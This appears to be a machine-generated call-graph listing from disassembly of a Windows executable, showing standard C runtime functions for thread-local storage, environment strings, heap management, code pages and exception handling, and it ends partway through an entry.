GetLastError 18971->18972 18973 ed5308 18971->18973 18972->18973 18974 ed52e3 ___vcrt_FlsFree 18972->18974 18973->18968 18974->18973 18975 ed52f9 LoadLibraryExW 18974->18975 18975->18968 18977 ed530c ___vcrt_FlsFree 5 API calls 18976->18977 18978 ed51a5 18977->18978 18979 ed51be TlsAlloc 18978->18979 18980 ec9aa2 18978->18980 18980->18950 18981 ed523c 18980->18981 18982 ed530c ___vcrt_FlsFree 5 API calls 18981->18982 18983 ed5256 18982->18983 18984 ed5271 TlsSetValue 18983->18984 18985 ec9abb 18983->18985 18984->18985 18985->18953 18986 ec9acb 18985->18986 18987 ec9ad5 18986->18987 18988 ec9adb 18986->18988 18990 ed51c6 18987->18990 18988->18950 18991 ed530c ___vcrt_FlsFree 5 API calls 18990->18991 18992 ed51e0 18991->18992 18993 ed51f8 TlsFree 18992->18993 18994 ed51ec 18992->18994 18993->18994 18994->18988 18996 ecd0fe 18995->18996 18997 ebbc4f 18995->18997 18996->18997 18999 ecc862 18996->18999 18997->18872 18997->18935 19000 ecc869 18999->19000 19001 ecc8ac GetStdHandle 19000->19001 19002 ecc90e 19000->19002 19003 ecc8bf GetFileType 19000->19003 19001->19000 19002->18996 19003->19000 19005 ec70bb 19004->19005 19006 ec70d1 19004->19006 19005->19006 19010 ec6ff3 19005->19010 19006->18877 19008 ec70c8 19008->19006 19027 ec71c0 19008->19027 19011 ec6ffc 19010->19011 19012 ec6fff 19010->19012 19011->19008 19036 ecc925 19012->19036 19017 ec701c 19069 ec70de 19017->19069 19018 ec7010 19063 ecad27 19018->19063 19023 ecad27 ___free_lconv_mon 14 API calls 19024 ec7040 19023->19024 19025 ecad27 ___free_lconv_mon 14 API calls 19024->19025 19026 ec7046 19025->19026 19026->19008 19028 ec7231 19027->19028 19032 ec71cf 19027->19032 19028->19006 19029 ecae71 WideCharToMultiByte _Fputc 19029->19032 19030 ecc0e0 __Getctype 14 API calls 19030->19032 19031 ec7235 19033 ecad27 ___free_lconv_mon 14 API calls 19031->19033 19032->19028 19032->19029 19032->19030 19032->19031 19035 ecad27 ___free_lconv_mon 14 API calls 19032->19035 19633 ed2053 19032->19633 19033->19028 19035->19032 19037 ecc92e 19036->19037 19041 ec7005 19036->19041 19091 ecb06e 19037->19091 19042 ed1f7c GetEnvironmentStringsW 19041->19042 19043 ec700a 19042->19043 19044 ed1f94 19042->19044 19043->19017 19043->19018 19045 ecae71 _Fputc WideCharToMultiByte 19044->19045 19046 ed1fb1 19045->19046 19047 ed1fbb FreeEnvironmentStringsW 19046->19047 19048 ed1fc6 19046->19048 19047->19043 19049 ecad61 __strnicoll 15 API calls 19048->19049 19050 ed1fcd 19049->19050 19051 ed1fd5 19050->19051 19052 ed1fe6 19050->19052 19053 ecad27 ___free_lconv_mon 14 API calls 19051->19053 19054 ecae71 _Fputc WideCharToMultiByte 19052->19054 19055 ed1fda FreeEnvironmentStringsW 19053->19055 19056 ed1ff6 19054->19056 19055->19043 19057 ed1ffd 19056->19057 19058 ed2005 19056->19058 19060 ecad27 ___free_lconv_mon 14 API calls 19057->19060 19059 ecad27 ___free_lconv_mon 14 API calls 19058->19059 19061 ed2003 FreeEnvironmentStringsW 19059->19061 19060->19061 19061->19043 19064 ecad32 RtlFreeHeap 19063->19064 19068 ec7016 19063->19068 19065 ecad47 GetLastError 19064->19065 19064->19068 19066 ecad54 __dosmaperr 19065->19066 19067 ec6bb1 __strnicoll 12 API calls 19066->19067 19067->19068 19068->19008 19070 ec70f3 19069->19070 19071 ecc0e0 __Getctype 14 API calls 19070->19071 19072 ec711a 19071->19072 19073 ec7122 19072->19073 19079 ec712c 19072->19079 19074 ecad27 ___free_lconv_mon 14 API calls 19073->19074 19075 ec7023 19074->19075 19075->19023 19076 ec7189 19077 ecad27 ___free_lconv_mon 14 API calls 19076->19077 19077->19075 19078 ecc0e0 __Getctype 14 API calls 19078->19079 19079->19076 19079->19078 19080 ec7198 19079->19080 19085 ec71b3 19079->19085 19087 ecad27 ___free_lconv_mon 14 API calls 19079->19087 19614 eca99c 19079->19614 19623 ec7083 19080->19623 19084 ecad27 ___free_lconv_mon 14 API calls 19086 ec71a5 19084->19086 19629 ec72c9 IsProcessorFeaturePresent 19085->19629 19089 ecad27 ___free_lconv_mon 14 API calls 19086->19089 19087->19079 19089->19075 19090 ec71bf 19092 ecb079 19091->19092 19093 ecb07f 19091->19093 19138 ecb9cb 19092->19138 19114 ecb085 19093->19114 19143 ecba0a 19093->19143 19099 ecb08a 19116 eccce6 19099->19116 19102 ecb0c6 19104 ecba0a __Getctype 6 API calls 19102->19104 19103 ecb0b1 19105 ecba0a __Getctype 6 API calls 19103->19105 19106 ecb0d2 19104->19106 19107 ecb0bd 19105->19107 19108 ecb0e5 19106->19108 19109 ecb0d6 19106->19109 19112 ecad27 ___free_lconv_mon 14 API calls 19107->19112 19157 ecb2c4 19108->19157 19110 ecba0a __Getctype 6 API calls 19109->19110 19110->19107 19112->19114 19114->19099 19162 ec7806 19114->19162 19115 ecad27 ___free_lconv_mon 14 API calls 19115->19099 19117 eccd10 19116->19117 19435 eccb72 19117->19435 19120 eccd29 19120->19041 19123 eccd50 19449 ecc96d 19123->19449 19124 eccd42 19125 ecad27 ___free_lconv_mon 14 API calls 19124->19125 19125->19120 19128 eccd88 19129 ec6bb1 __strnicoll 14 API calls 19128->19129 19130 eccd8d 19129->19130 19132 ecad27 ___free_lconv_mon 14 API calls 19130->19132 19131 eccdcf 19134 ecce18 19131->19134 19460 ecd0a1 19131->19460 19132->19120 19133 eccda3 19133->19131 19136 ecad27 ___free_lconv_mon 14 API calls 19133->19136 19135 ecad27 ___free_lconv_mon 14 API calls 19134->19135 19135->19120 19136->19131 19173 ecbe0d 19138->19173 19141 ecb9f0 19141->19093 19142 ecba02 TlsGetValue 19144 ecbe0d std::_Locinfo::_Locinfo_dtor 5 API calls 19143->19144 19145 ecba26 19144->19145 19146 ecb099 19145->19146 19147 ecba44 TlsSetValue 19145->19147 19146->19114 19148 ecc0e0 19146->19148 19149 ecc0ed 19148->19149 19150 ecc12d 19149->19150 19151 ecc118 HeapAlloc 19149->19151 19156 ecc101 __Getctype 19149->19156 19191 ec6bb1 19150->19191 19152 ecc12b 19151->19152 19151->19156 19154 ecb0a9 19152->19154 19154->19102 19154->19103 19156->19150 19156->19151 19188 ec4d3c 19156->19188 19228 ecb42a 19157->19228 19330 ecd1a5 19162->19330 19165 ec7816 19167 ec7820 IsProcessorFeaturePresent 19165->19167 19172 ec783f 19165->19172 19168 ec782c 19167->19168 19360 ec72fd 19168->19360 19169 ec4a20 __CreateFrameInfo 21 API calls 19170 ec7849 19169->19170 19172->19169 19174 ecbe3d 19173->19174 19177 ecb9e7 19173->19177 19174->19177 19180 ecbd42 19174->19180 19177->19141 19177->19142 19178 ecbe57 GetProcAddress 19178->19177 19179 ecbe67 std::_Locinfo::_Locinfo_dtor 19178->19179 19179->19177 19186 ecbd53 ___vcrt_FlsFree 19180->19186 19181 ecbde9 19181->19177 19181->19178 19182 ecbd71 LoadLibraryExW 19183 ecbd8c GetLastError 19182->19183 19184 ecbdf0 19182->19184 19183->19186 19184->19181 19185 ecbe02 FreeLibrary 19184->19185 19185->19181 19186->19181 19186->19182 19187 ecbdbf LoadLibraryExW 19186->19187 19187->19184 19187->19186 19194 ec4d77 19188->19194 19205 ecb104 GetLastError 19191->19205 19193 ec6bb6 19193->19154 19195 ec4d83 ___scrt_is_nonwritable_in_current_image 19194->19195 19200 ec7594 EnterCriticalSection 19195->19200 19197 ec4d8e __CreateFrameInfo 19201 ec4dc5 19197->19201 19200->19197 19204 ec75ab LeaveCriticalSection 19201->19204 19203 ec4d47 19203->19156 19204->19203 19206 ecb11a 19205->19206 19209 ecb120 19205->19209 19207 ecb9cb __Getctype 6 API calls 19206->19207 19207->19209 19208 ecba0a __Getctype 6 API calls 19210 ecb13c 19208->19210 19209->19208 19225 ecb124 SetLastError 19209->19225 19212 ecc0e0 __Getctype 12 API calls 19210->19212 19210->19225 19213 ecb151 19212->19213 19214 ecb159 19213->19214 19215 ecb16a 19213->19215 19217 ecba0a __Getctype 6 API calls 19214->19217 19216 ecba0a __Getctype 6 API calls 19215->19216 19218 ecb176 19216->19218 19219 ecb167 19217->19219 19220 ecb17a 19218->19220 19221 ecb191 19218->19221 19223 ecad27 ___free_lconv_mon 12 API calls 19219->19223 19222 ecba0a __Getctype 6 API calls 19220->19222 19224 ecb2c4 __Getctype 12 API calls 19221->19224 19222->19219 19223->19225 19226 ecb19c 19224->19226 19225->19193 19227 ecad27 ___free_lconv_mon 12 API calls 19226->19227 19227->19225 19229 ecb436 ___scrt_is_nonwritable_in_current_image 19228->19229 19242 ec7594 EnterCriticalSection 19229->19242 19231 ecb440 19243 ecb470 19231->19243 19234 ecb47c 19235 ecb488 ___scrt_is_nonwritable_in_current_image 19234->19235 19247 ec7594 EnterCriticalSection 19235->19247 19237 ecb492 19248 ecb279 19237->19248 19239 ecb4aa 19252 ecb4ca 19239->19252 19242->19231 19246 ec75ab LeaveCriticalSection 19243->19246 19245 ecb332 19245->19234 19246->19245 19247->19237 19249 ecb288 __Getctype 19248->19249 19250 ecb2af __Getctype 19248->19250 19249->19250 19255 ecf4ca 19249->19255 19250->19239 19329 ec75ab LeaveCriticalSection 19252->19329 19254 ecb0f0 19254->19115 19256 ecf54a 19255->19256 19259 ecf4e0 19255->19259 19258 ecad27 ___free_lconv_mon 14 API calls 19256->19258 19281 ecf598 19256->19281 19260 ecf56c 19258->19260 19259->19256 19263 ecf513 19259->19263 19265 ecad27 ___free_lconv_mon 14 API calls 19259->19265 19261 ecad27 ___free_lconv_mon 14 API calls 19260->19261 19262 ecf57f 19261->19262 19266 ecad27 ___free_lconv_mon 14 API calls 19262->19266 19267 ecad27 ___free_lconv_mon 14 API calls 19263->19267 19282 ecf535 19263->19282 19264 ecad27 ___free_lconv_mon 14 API calls 19268 ecf53f 19264->19268 19270 ecf508 19265->19270 19272 ecf58d 19266->19272 19273 ecf52a 19267->19273 19274 ecad27 ___free_lconv_mon 14 API calls 19268->19274 19269 ecf606 19275 ecad27 ___free_lconv_mon 14 API calls 19269->19275 19283 ece92c 19270->19283 19277 ecad27 ___free_lconv_mon 14 API calls 19272->19277 19311 ecec47 19273->19311 19274->19256 19280 ecf60c 19275->19280 19276 ecf5a6 19276->19269 19279 ecad27 14 API calls ___free_lconv_mon 19276->19279 19277->19281 19279->19276 19280->19250 19323 ecf664 19281->19323 19282->19264 19284 ece93d 19283->19284 19310 ecea26 19283->19310 19285 ece94e 19284->19285 19286 ecad27 ___free_lconv_mon 14 API calls 19284->19286 19287 ecad27 ___free_lconv_mon 14 API calls 19285->19287 19288 ece960 19285->19288 19286->19285 19287->19288 19289 ece972 19288->19289 19290 ecad27 ___free_lconv_mon 14 API calls 19288->19290 19291 ece984 19289->19291 19292 ecad27 ___free_lconv_mon 14 API calls 19289->19292 19290->19289 19293 ece996 19291->19293 19294 ecad27 ___free_lconv_mon 14 API calls 19291->19294 19292->19291 19294->19293 19310->19263 19312 ececac 19311->19312 19313 ecec54 19311->19313 19312->19282 19314 ecec64 19313->19314 19315 ecad27 ___free_lconv_mon 14 API calls 19313->19315 19316 ecec76 19314->19316 19317 ecad27 ___free_lconv_mon 14 API calls 19314->19317 19315->19314 19318 ecec88 19316->19318 19319 ecad27 ___free_lconv_mon 14 API calls 19316->19319 19317->19316 19320 ecec9a 19318->19320 19321 ecad27 ___free_lconv_mon 14 API calls 19318->19321 19319->19318 19320->19312 19321->19320 19324 ecf671 19323->19324 19328 ecf690 19323->19328 19325 eced2b __Getctype 14 API calls 19324->19325 19324->19328 19326 ecf68a 19325->19326 19327 ecad27 ___free_lconv_mon 14 API calls 19326->19327 19327->19328 19328->19276 19329->19254 19366 ecd428 19330->19366 19333 ecd1cc 19337 ecd1d8 ___scrt_is_nonwritable_in_current_image 19333->19337 19334 ecb104 __dosmaperr 14 API calls 19343 ecd209 __CreateFrameInfo 19334->19343 19335 ecd228 19336 ec6bb1 __strnicoll 14 API calls 19335->19336 19339 ecd22d 19336->19339 19337->19334 19337->19335 19338 ecd23a __CreateFrameInfo 19337->19338 19337->19343 19340 ecd270 __CreateFrameInfo 19338->19340 19380 ec7594 EnterCriticalSection 19338->19380 19377 ec729c 19339->19377 19345 ecd2ad 19340->19345 19346 ecd3aa 19340->19346 19356 ecd2db 19340->19356 19343->19335 19343->19338 19359 ecd212 19343->19359 19345->19356 19381 ecafb3 GetLastError 19345->19381 19348 ecd3b5 19346->19348 19412 ec75ab LeaveCriticalSection 19346->19412 19349 ec4a20 __CreateFrameInfo 21 API calls 19348->19349 19351 ecd3bd 19349->19351 19353 ecafb3 __Getctype 39 API calls 19357 ecd330 19353->19357 19355 ecafb3 __Getctype 39 API calls 19355->19356 19408 ecd356 19356->19408 19358 ecafb3 __Getctype 39 API calls 19357->19358 19357->19359 19358->19359 19359->19165 19361 ec7319 __CreateFrameInfo std::bad_exception::bad_exception 19360->19361 19362 ec7345 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 19361->19362 19363 ec7416 __CreateFrameInfo 19362->19363 19427 ebba3f 19363->19427 19365 ec7434 19365->19172 19367 ecd434 ___scrt_is_nonwritable_in_current_image 19366->19367 19372 ec7594 EnterCriticalSection 19367->19372 19369 ecd442 19373 ecd484 19369->19373 19372->19369 19376 ec75ab LeaveCriticalSection 19373->19376 19375 ec780b 19375->19165 19375->19333 19376->19375 19413 ec74eb 19377->19413 19379 ec72a8 19379->19359 19380->19340 19382 ecafc9 19381->19382 19383 ecafcf 19381->19383 19384 ecb9cb __Getctype 6 API calls 19382->19384 19385 ecba0a __Getctype 6 API calls 19383->19385 19406 ecafd3 SetLastError 19383->19406 19384->19383 19386 ecafeb 19385->19386 19388 ecc0e0 __Getctype 14 API calls 19386->19388 19386->19406 19389 ecb000 19388->19389 19393 ecb008 19389->19393 19394 ecb019 19389->19394 19390 ecb068 19392 ec7806 CallUnexpected 37 API calls 19390->19392 19391 ecb063 19391->19355 19395 ecb06d 19392->19395 19396 ecba0a __Getctype 6 API calls 19393->19396 19397 ecba0a __Getctype 6 API calls 19394->19397 19399 ecb016 19396->19399 19398 ecb025 19397->19398 19400 ecb029 19398->19400 19401 ecb040 19398->19401 19403 ecad27 ___free_lconv_mon 14 API calls 19399->19403 19402 ecba0a __Getctype 6 API calls 19400->19402 19404 ecb2c4 __Getctype 14 API calls 19401->19404 19402->19399 19403->19406 19405 ecb04b 19404->19405 19407 ecad27 ___free_lconv_mon 14 API calls 19405->19407 19406->19390 19406->19391 19407->19406 19409 ecd35a 19408->19409 19410 ecd322 19408->19410 19426 ec75ab LeaveCriticalSection 19409->19426 19410->19353 19410->19357 19410->19359 19412->19348 19414 ec74fd _Fputc 19413->19414 19417 ec7445 19414->19417 19416 ec7515 _Fputc 19416->19379 19418 ec7455 19417->19418 19421 ec745c 19417->19421 19419 ec2240 __strnicoll 16 API calls 19418->19419 19419->19421 19420 ec74c2 __strnicoll GetLastError SetLastError 19422 ec7491 19420->19422 19421->19420 19424 ec746a 19421->19424 19423 ec72c9 __Getctype 11 API calls 19422->19423 19422->19424 19425 ec74c1 19423->19425 19424->19416 19426->19410 19428 ebba48 IsProcessorFeaturePresent 19427->19428 19429 ebba47 19427->19429 19431 ebdf86 19428->19431 19429->19365 19434 ebe06c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 19431->19434 19433 ebe069 19433->19365 19434->19433 19468 ec142a 19435->19468 19438 eccba5 19440 eccbaa GetACP 19438->19440 19441 eccbbc 19438->19441 19439 eccb93 GetOEMCP 19439->19441 19440->19441 19441->19120 19442 ecad61 19441->19442 19443 ecad9f 19442->19443 19447 ecad6f __Getctype 19442->19447 19444 ec6bb1 __strnicoll 14 API calls 19443->19444 19446 ecad9d 19444->19446 19445 ecad8a RtlAllocateHeap 19445->19446 19445->19447 19446->19123 19446->19124 19447->19443 19447->19445 19448 ec4d3c std::ios_base::_Init 2 API calls 19447->19448 19448->19447 19450 eccb72 41 API calls 19449->19450 19451 ecc98d 19450->19451 19452 ecca92 19451->19452 19454 ecc9ca IsValidCodePage 19451->19454 19458 ecc9e5 std::bad_exception::bad_exception 19451->19458 19453 ebba3f _ValidateLocalCookies 5 API calls 19452->19453 19455 eccb70 19453->19455 19454->19452 19456 ecc9dc 19454->19456 19455->19128 19455->19133 19457 ecca05 GetCPInfo 19456->19457 19456->19458 19457->19452 19457->19458 19508 eccefc 19458->19508 19461 ecd0ad ___scrt_is_nonwritable_in_current_image 19460->19461 19588 ec7594 EnterCriticalSection 19461->19588 19463 ecd0b7 19589 ecce3b 19463->19589 19469 ec1448 19468->19469 19475 ec1441 19468->19475 19470 ecafb3 __Getctype 39 API calls 19469->19470 19469->19475 19471 ec1469 19470->19471 19476 ecb596 19471->19476 19475->19438 19475->19439 19477 ec147f 19476->19477 19478 ecb5a9 19476->19478 19480 ecb5c3 19477->19480 19478->19477 19484 ecf695 19478->19484 19481 ecb5eb 19480->19481 19482 ecb5d6 19480->19482 19481->19475 19482->19481 19505 ecc912 19482->19505 19485 ecf6a1 ___scrt_is_nonwritable_in_current_image 19484->19485 19486 ecafb3 __Getctype 39 API calls 19485->19486 19487 ecf6aa 19486->19487 19494 ecf6f0 19487->19494 19497 ec7594 EnterCriticalSection 19487->19497 19489 ecf6c8 19498 ecf716 19489->19498 19494->19477 19495 ec7806 CallUnexpected 39 API calls 19496 ecf715 19495->19496 19497->19489 19499 ecf6d9 19498->19499 19500 ecf724 __Getctype 19498->19500 19502 ecf6f5 19499->19502 19500->19499 19501 ecf4ca __Getctype 14 API calls 19500->19501 19501->19499 19503 ec75ab std::_Lockit::~_Lockit LeaveCriticalSection 19502->19503 19504 ecf6ec 19503->19504 19504->19494 19504->19495 19506 ecafb3 __Getctype 39 API calls 19505->19506 19507 ecc917 19506->19507 19507->19481 19509 eccf24 GetCPInfo 19508->19509 19518 eccfed 19508->19518 19515 eccf3c 19509->19515 19509->19518 19510 ebba3f _ValidateLocalCookies 5 API calls 19512 ecd09f 19510->19512 19512->19452 19519 ecc3cc 19515->19519 19518->19510 19520 ec142a __strnicoll 39 API calls 19519->19520 19521 ecc3ec 19520->19521 19539 ecadaf 19521->19539 19523 ecc4a8 19526 ebba3f _ValidateLocalCookies 5 API calls 19523->19526 19524 ecc4a0 19542 ebea27 19524->19542 19525 ecc419 19525->19523 19525->19524 19528 ecad61 __strnicoll 15 API calls 19525->19528 19530 ecc43e __alloca_probe_16 std::bad_exception::bad_exception 19525->19530 19529 ecc4cb 19526->19529 19528->19530 19534 ecc4cd 19529->19534 19530->19524 19531 ecadaf __strnicoll MultiByteToWideChar 19530->19531 19532 ecc487 19531->19532 19532->19524 19533 ecc48e GetStringTypeW 19532->19533 19533->19524 19535 ec142a __strnicoll 39 API calls 19534->19535 19536 ecc4e0 19535->19536 19551 ecc516 19536->19551 19546 ecadd9 19539->19546 19543 ebea42 19542->19543 19544 ebea31 19542->19544 19543->19523 19544->19543 19548 ec831e 19544->19548 19547 ecadcb MultiByteToWideChar 19546->19547 19547->19525 19549 ecad27 ___free_lconv_mon 14 API calls 19548->19549 19550 ec8336 19549->19550 19550->19543 19552 ecc531 __strnicoll 19551->19552 19553 ecadaf __strnicoll MultiByteToWideChar 19552->19553 19557 ecc575 19553->19557 19554 ecc6f0 19557->19554 19558 ecad61 __strnicoll 15 API calls 19557->19558 19560 ecc59b __alloca_probe_16 19557->19560 19571 ecc643 19557->19571 19558->19560 19560->19571 19588->19463 19599 ec8d0b 19589->19599 19591 ecce5d 19592 ec8d0b 29 API calls 19591->19592 19593 ecce7c 19592->19593 19594 eccea3 19593->19594 19595 ecad27 ___free_lconv_mon 14 API calls 19593->19595 19596 ecd0e2 19594->19596 19595->19594 19613 ec75ab LeaveCriticalSection 19596->19613 19598 ecd0d0 19598->19134 19600 ec8d1c 19599->19600 19609 ec8d18 _Yarn 19599->19609 19601 ec8d23 19600->19601 19605 ec8d36 std::bad_exception::bad_exception 19600->19605 19602 ec6bb1 __strnicoll 14 API calls 19601->19602 19603 ec8d28 19602->19603 19604 ec729c __strnicoll 29 API calls 19603->19604 19604->19609 19606 ec8d6d 19605->19606 19607 ec8d64 19605->19607 19605->19609 19606->19609 19611 ec6bb1 __strnicoll 14 API calls 19606->19611 19608 ec6bb1 __strnicoll 14 API calls 19607->19608 19610 ec8d69 19608->19610 19609->19591 19612 ec729c __strnicoll 29 API calls 19610->19612 19611->19610 19612->19609 19613->19598 19615 eca9aa 19614->19615 19616 eca9b8 19614->19616 19615->19616 19621 eca9d0 19615->19621 19617 ec6bb1 __strnicoll 14 API calls 19616->19617 19618 eca9c0 19617->19618 19619 ec729c __strnicoll 29 API calls 19618->19619 19620 eca9ca 19619->19620 19620->19079 19621->19620 19622 ec6bb1 __strnicoll 14 API calls 19621->19622 19622->19618 19624 ec7090 19623->19624 19628 ec70ad 19623->19628 19625 ec70a7 19624->19625 19626 ecad27 ___free_lconv_mon 14 API calls 19624->19626 19627 ecad27 ___free_lconv_mon 14 API calls 19625->19627 19626->19624 19627->19628 19628->19084 19630 ec72d5 19629->19630 19631 ec72fd __CreateFrameInfo 8 API calls 19630->19631 19632 ec72ea GetCurrentProcess TerminateProcess 19631->19632 19632->19090 19634 ed205e 19633->19634 19635 ed206f 19634->19635 19637 ed2082 ___from_strstr_to_strchr 19634->19637 19636 ec6bb1 __strnicoll 14 API calls 19635->19636 19645 ed2074 19636->19645 19638 ed2299 19637->19638 19640 ed20a2 19637->19640 19639 ec6bb1 __strnicoll 14 API calls 19638->19639 19641 ed229e 19639->19641 19696 ed22be 19640->19696 19643 ecad27 ___free_lconv_mon 14 API calls 19641->19643 19643->19645 19645->19032 19646 ed20e6 19682 ed20d2 19646->19682 19700 ed22d8 19646->19700 19647 ed20e8 19651 ecc0e0 __Getctype 14 API calls 19647->19651 19647->19682 19649 ed20c4 19654 ed20cd 19649->19654 19655 ed20e1 19649->19655 19653 ed20f6 19651->19653 19652 ecad27 ___free_lconv_mon 14 API calls 19652->19645 19657 ecad27 ___free_lconv_mon 14 API calls 19653->19657 19658 ec6bb1 __strnicoll 14 API calls 19654->19658 19659 ed22be 39 API calls 19655->19659 19656 ed215b 19660 ecad27 ___free_lconv_mon 14 API calls 19656->19660 19661 ed2101 19657->19661 19658->19682 19659->19646 19666 ed2163 19660->19666 19661->19646 19664 ecc0e0 __Getctype 14 API calls 19661->19664 19661->19682 19662 ed21a6 19663 ed1673 std::ios_base::_Init 32 API calls 19662->19663 19662->19682 19665 ed21d4 19663->19665 19667 ed211d 19664->19667 19669 ecad27 ___free_lconv_mon 14 API calls 19665->19669 19673 ed2190 19666->19673 19704 ed1673 19666->19704 19671 ecad27 ___free_lconv_mon 14 API calls 19667->19671 19668 ed228e 19672 ecad27 ___free_lconv_mon 14 API calls 19668->19672 19669->19673 19671->19646 19672->19645 19673->19668 19676 ecc0e0 __Getctype 14 API calls 19673->19676 19673->19682 19674 ed2187 19675 ecad27 ___free_lconv_mon 14 API calls 19674->19675 19675->19673 19677 ed221f 19676->19677 19678 ed222f 19677->19678 19679 ed2227 19677->19679 19681 eca99c ___std_exception_copy 29 API calls 19678->19681 19680 ecad27 ___free_lconv_mon 14 API calls 19679->19680 19680->19682 19683 ed223b 19681->19683 19682->19652 19684 ed22b3 19683->19684 19685 ed2242 19683->19685 19686 ec72c9 __Getctype 11 API calls 19684->19686 19713 ed952c 19685->19713 19689 ed22bd 19686->19689 19690 ed2269 19692 ec6bb1 __strnicoll 14 API calls 19690->19692 19691 ed2288 19693 ecad27 ___free_lconv_mon 14 API calls 19691->19693 19694 ed226e 19692->19694 19693->19668 19695 ecad27 ___free_lconv_mon 14 API calls 19694->19695 19695->19682 19697 ed22cb 19696->19697 19698 ed20ad 19696->19698 19728 ed232d 19697->19728 19698->19646 19698->19647 19698->19649 19701 ed22ee 19700->19701 19703 ed214b 19700->19703 19701->19703 19743 ed943b 19701->19743 19703->19656 19703->19662 19705 ed169b 19704->19705 19706 ed1680 19704->19706 19708 ed16aa 19705->19708 19843 ed83c4 19705->19843 19706->19705 19707 ed168c 19706->19707 19709 ec6bb1 __strnicoll 14 API calls 19707->19709 19850 ed4976 19708->19850 19712 ed1691 std::bad_exception::bad_exception 19709->19712 19712->19674 19862 ecc0a1 19713->19862 19718 ed959f 19721 ed95ab 19718->19721 19723 ecad27 ___free_lconv_mon 14 API calls 19718->19723 19719 ecc0a1 39 API calls 19722 ed957c 19719->19722 19720 ed2263 19720->19690 19720->19691 19721->19720 19724 ecad27 ___free_lconv_mon 14 API calls 19721->19724 19725 ec1524 17 API calls 19722->19725 19723->19721 19724->19720 19726 ed9589 19725->19726 19726->19718 19727 ed9593 SetEnvironmentVariableW 19726->19727 19727->19718 19729 ed2340 19728->19729 19737 ed233b 19728->19737 19729->19729 19730 ecc0e0 __Getctype 14 API calls 19729->19730 19740 ed235d 19730->19740 19731 ed23cb 19733 ec7806 CallUnexpected 39 API calls 19731->19733 19732 ed23ba 19735 ecad27 ___free_lconv_mon 14 API calls 19732->19735 19734 ed23d0 19733->19734 19736 ec72c9 __Getctype 11 API calls 19734->19736 19735->19737 19738 ed23dc 19736->19738 19737->19698 19739 ecc0e0 __Getctype 14 API calls 19739->19740 19740->19731 19740->19732 19740->19734 19740->19739 19741 ecad27 ___free_lconv_mon 14 API calls 19740->19741 19742 eca99c ___std_exception_copy 29 API calls 19740->19742 19741->19740 19742->19740 19744 ed944f 19743->19744 19745 ed9449 19743->19745 19761 ed9464 19744->19761 19748 eda08b 19745->19748 19749 eda043 19745->19749 19781 eda0a1 19748->19781 19751 eda049 19749->19751 19752 eda066 19749->19752 19754 ec6bb1 __strnicoll 14 API calls 19751->19754 19757 ec6bb1 __strnicoll 14 API calls 19752->19757 19760 eda084 19752->19760 19753 eda059 19753->19701 19755 eda04e 19754->19755 19756 ec729c __strnicoll 29 API calls 19755->19756 19756->19753 19758 eda075 19757->19758 19759 ec729c __strnicoll 29 API calls 19758->19759 19759->19753 19760->19701 19762 ec142a __strnicoll 39 API calls 19761->19762 19763 ed947a 19762->19763 19764 ed9496 19763->19764 19765 ed94ad 19763->19765 19780 ed945f 19763->19780 19766 ec6bb1 __strnicoll 14 API calls 19764->19766 19768 ed94c8 19765->19768 19769 ed94b6 19765->19769 19767 ed949b 19766->19767 19772 ec729c __strnicoll 29 API calls 19767->19772 19770 ed94e8 19768->19770 19771 ed94d5 19768->19771 19773 ec6bb1 __strnicoll 14 API calls 19769->19773 19799 eda16c 19770->19799 19774 eda0a1 __strnicoll 39 API calls 19771->19774 19772->19780 19776 ed94bb 19773->19776 19774->19780 19778 ec729c __strnicoll 29 API calls 19776->19778 19778->19780 19779 ec6bb1 __strnicoll 14 API calls 19779->19780 19780->19701 19782 eda0cb 19781->19782 19783 eda0b1 19781->19783 19784 eda0ea 19782->19784 19785 eda0d3 19782->19785 19786 ec6bb1 __strnicoll 14 API calls 19783->19786 19788 eda0f6 19784->19788 19793 eda10d 19784->19793 19787 ec6bb1 __strnicoll 14 API calls 19785->19787 19789 eda0b6 19786->19789 19791 eda0d8 19787->19791 19792 ec6bb1 __strnicoll 14 API calls 19788->19792 19790 ec729c __strnicoll 29 API calls 19789->19790 19797 eda0c1 19790->19797 19795 ec729c __strnicoll 29 API calls 19791->19795 19796 eda0fb 19792->19796 19794 ec142a __strnicoll 39 API calls 19793->19794 19793->19797 19794->19797 19795->19797 19798 ec729c __strnicoll 29 API calls 19796->19798 19797->19753 19798->19797 19800 ec142a __strnicoll 39 API calls 19799->19800 19801 eda17f 19800->19801 19804 eda1b2 19801->19804 19807 eda1e6 __strnicoll 19804->19807 19805 ebba3f _ValidateLocalCookies 5 API calls 19806 ed94fe 19805->19806 19806->19779 19806->19780 19808 eda266 19807->19808 19809 eda44a 19807->19809 19811 eda253 GetCPInfo 19807->19811 19816 eda26a 19807->19816 19810 ecadaf __strnicoll MultiByteToWideChar 19808->19810 19808->19816 19813 eda2ec 19810->19813 19811->19808 19811->19816 19812 eda43e 19815 ebea27 __freea 14 API calls 19812->19815 19813->19812 19814 ecad61 __strnicoll 15 API calls 19813->19814 19813->19816 19817 eda313 __alloca_probe_16 19813->19817 19814->19817 19815->19816 19816->19805 19816->19809 19817->19812 19818 ecadaf __strnicoll MultiByteToWideChar 19817->19818 19819 eda35f 19818->19819 19819->19812 19820 ecadaf __strnicoll MultiByteToWideChar 19819->19820 19821 eda37b 19820->19821 19821->19812 19822 eda389 19821->19822 19823 eda3ec 19822->19823 19824 ecad61 __strnicoll 15 API calls 19822->19824 19827 eda3a2 __alloca_probe_16 19822->19827 19825 ebea27 __freea 14 API calls 19823->19825 19824->19827 19826 eda3f2 19825->19826 19828 ebea27 __freea 14 API calls 19826->19828 19827->19823 19829 ecadaf __strnicoll MultiByteToWideChar 19827->19829 19828->19816 19830 eda3e5 19829->19830 19830->19823 19831 eda40e 19830->19831 19837 ecb89c 19831->19837 19834 ebea27 __freea 14 API calls 19838 ecbeac std::_Locinfo::_Locinfo_dtor 5 API calls 19837->19838 19839 ecb8a7 19838->19839 19840 ecbbe6 __strnicoll 5 API calls 19839->19840 19842 ecb8ad 19839->19842 19841 ecb8ed CompareStringW 19840->19841 19841->19842 19842->19834 19844 ed83cf 19843->19844 19845 ed83e4 HeapSize 19843->19845 19846 ec6bb1 __strnicoll 14 API calls 19844->19846 19845->19708 19847 ed83d4 19846->19847 19848 ec729c __strnicoll 29 API calls 19847->19848 19849 ed83df 19848->19849 19849->19708 19851 ed498e 19850->19851 19852 ed4983 19850->19852 19854 ed499f __Getctype 19851->19854 19855 ed4996 19851->19855 19853 ecad61 __strnicoll 15 API 